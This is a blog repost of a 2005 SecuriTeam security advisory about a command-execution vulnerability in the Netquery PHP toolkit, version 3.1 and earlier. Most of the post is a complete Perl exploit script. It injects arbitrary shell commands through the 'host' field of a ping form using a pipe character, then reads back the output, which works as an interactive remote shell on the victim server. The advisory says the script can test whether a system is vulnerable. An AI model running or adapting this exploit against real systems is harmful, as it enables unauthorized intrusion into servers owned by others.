Search This Blog

Monday, July 25, 2005

[EXPL] Netquery Command Execution (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Netquery Command Execution (Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://virtech.org/tools/index.html> Netquery - the complete PHP/SQL
open-source toolkit of network information utilities"

A vulnerability discovered in Netquery allows remote attackers to cause
the program to execute arbitrary code, the following exploit code can be
used to determine whether your system is vulnerable or not.

DETAILS

Vulnerable Systems:
* Netquery versions 3.1 and prior

Exploit:
#!/usr/bin/perl -w

use strict;
use LWP;

my $browser = new LWP::UserAgent;
$browser->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");

if (@ARGV < 1) {
print "\nusage: ./nq.pl http://path/to/form\n\n";
exit(1);
}

my $url = $ARGV[0];
my $command;

while (1) {
print "> ";
while(<STDIN>) {
$command = $_;
chomp($command);
last;
}
&send($command);
}

sub send {
my $ok = 0;
my $output;
my @d;
my $response = $browser->post($url,
[ 'op'
=> 'modload',
'name' =>
'Netquery',
'file'
=> 'pnuser',

'querytype' => 'ping',
'host' =>
'| echo _start_; ' . $command . '; echo _end_;',
'maxp' =>
'4',
]);

die "$url could not be reached" unless $response->is_success;
if ($response->content =~ /<blockquote>_start_(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /_end_/, $output;
print "\n $d[0]\n";
}
elsif ($response->content =~ /_start_(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /_end_/, $output;
print "\n $d[0]\n";
}
elsif ($response->content =~ /<blockquote>(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /<\/blockquote>/, $output;
print "\n $d[0]\n";
}
else {
print "Not working for some reason\n";
}
}

ADDITIONAL INFORMATION

The original article can be found at:
<http://www.milw0rm.com/id.php?id=1117>
http://www.milw0rm.com/id.php?id=1117

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)